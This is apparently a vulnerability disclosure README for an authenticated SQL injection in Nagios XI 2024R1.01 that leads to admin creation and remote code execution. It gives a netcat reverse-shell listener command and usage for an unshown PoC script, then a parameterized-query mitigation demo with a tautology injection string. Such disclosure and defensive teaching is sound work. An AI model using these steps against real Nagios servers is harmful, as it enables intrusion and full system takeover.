CVE Discovered by: Jarod Jaslow (MAWK)
(DESIGNED TO BE RUN ON KALI LINUX)
- Endpoint: /nagiosxi//config/monitoringwizard.php
- Product: Nagios XI Version 2024R1.01
- Vulnerability Type: Authenticated SQL Injection
- Exploitation Result: Admin account creation and full remote code execution
- Start a local listener on the attacker machine using netcat:
  nc -nlvp 4444
- Execute the provided Python script with the correct arguments:
  python3 MawkiNagiosXIPOC.py <target IP> <Local Listening IP> <NC listening port>
Attached is the Python script demonstrating the vulnerability.
To mitigate the risk of SQL injection, it is strongly advised to use parameterized queries or prepared statements when interacting with databases. Parameterized queries ensure that user input is treated as data, not executable code, making it much more difficult for attackers to inject malicious SQL statements.
This should be mitigated in recent updates.
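The following is an added illustration of the parameterized-query mitigation described above; it is not the PoC script and does not use Nagios XI's real schema. The table, rows and field names are constructed for the demo; the only thing it shows is how the same quoted input behaves against a string-built query versus a bound parameter.

```python
import sqlite3

def make_db():
    # Constructed sample schema (NOT the Nagios XI database layout).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hosts (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO hosts (name, owner) VALUES (?, ?)",
        [("web01", "alice"), ("db01", "alice"), ("core-rtr", "bob")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, owner, name):
    # Vulnerable pattern: user input is spliced into the SQL text, so a quote
    # in 'name' changes the structure of the statement the database parses.
    sql = (f"SELECT name FROM hosts WHERE owner = '{owner}' "
           f"AND name = '{name}' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, owner, name):
    # Mitigation: the statement text is fixed; values travel as bound
    # parameters and are always treated as data, never as SQL.
    sql = "SELECT name FROM hosts WHERE owner = ? AND name = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (owner, name))]

def demo():
    conn = make_db()
    benign = "web01"
    # Textbook tautology input, used here only to show the behavioural difference.
    tautology = "x' OR '1'='1"
    return {
        "vuln_benign": lookup_vulnerable(conn, "alice", benign),
        "vuln_tautology": lookup_vulnerable(conn, "alice", tautology),  # leaks every row
        "safe_benign": lookup_safe(conn, "alice", benign),
        "safe_tautology": lookup_safe(conn, "alice", tautology),        # matches nothing
    }

if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:16} -> {rows}")
```

Bound parameters only cover values; table and column names chosen from user input still need a strict allow-list, since drivers cannot bind identifiers.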
CVE: